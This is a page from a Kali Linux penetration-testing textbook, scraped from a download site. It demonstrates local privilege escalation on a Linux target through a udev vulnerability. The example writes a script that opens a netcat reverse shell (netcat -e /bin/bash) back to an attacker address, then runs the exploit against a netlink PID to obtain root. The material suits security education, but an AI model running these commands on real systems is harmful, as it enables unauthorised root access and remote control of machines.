| Chapter 6: Owning Metasploit




Download 22,59 Mb.
Pdf ko'rish
bet179/225
Sana14.05.2024
Hajmi22,59 Mb.
#232856
1   ...   175   176   177   178   179   180   181   182   ...   225
Bog'liq
learningkalilinux

194 | Chapter 6: Owning Metasploit

You’ll notice there are no prompts after exploitation. That’s an arti‐
fact of this exploit and the user we have exploited. Just because we
don’t get a prompt doesn’t mean we haven’t compromised the sys‐
tem. Just start sending commands to see if they are accepted.
We aren’t ready to perform the exploit, though. We have some work to do. The
exploit works by injecting into a running process. First, we need to identify the PID
we are going to inject into. We can use the 
proc
pseudo filesystem, which stores infor‐
mation associated with processes. We are looking for the PID for the 
netlink
process.
We find that to be 2686 in 
Example 6-17
. To verify that, we can just double-check
against the PID for the 
udev
process. The PID we need to infect is going to be one
below the 
udev
PID. We can see that the 
udev
PID is 2687, which is one above the
PID we had already identified. This means that we know the PID to use, but we still
need to stage a bash script that our exploit is going to call. We populate that script
with a call to 
netcat
, which will open up a connection back to the Kali system, where
we’ll create a listener using 
netcat
.
Example 6-17. Privilege escalation using udev vulnerability
cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
ddf0e800 
0
0
00000000
0
0
00000000
2
df7df400 
4
0
00000000
0
0
00000000
2
dd39d800 
7
0
00000000
0
0
00000000
2
df16f600 
9
0
00000000
0
0
00000000
2
dd82f400 
10
0
00000000
0
0
00000000
2
ddf0ec00 
15
0
00000000
0
0
00000000
2
dccbe600 
15
2686
00000001
0
0
00000000
2
de12d800 
16
0
00000000
0
0
00000000
2
df93e400 
18
0
00000000
0
0
00000000
2
ps auxww | grep udev
root
2687
0.0 0.1
2092
620
? Secho
"#!/bin/bash"
> /tmp/run
echo
"/bin/netcat -e /bin/bash 192.168.86.30 8888"
>> /tmp/run
./tuxbowling 2686
On the Kali end, we would use 
netcat -l -p 8888
, which tells 
netcat
to start up a lis‐
tener on port 8888. I selected that port, but there is nothing special about it. You
could use any port you wanted so you have a listener. Remember, you won’t get a
prompt or any indication that you are connected on the 
netcat
listener end. You can,
again, just start to type commands. The first thing you can do is run 
whoami
to deter‐
mine what user you are connected as. After running the exploit, you will find that you
are root. You will also find that you have been placed into the root of the filesystem
(/).

Download 22,59 Mb.
1   ...   175   176   177   178   179   180   181   182   ...   225




Download 22,59 Mb.
Pdf ko'rish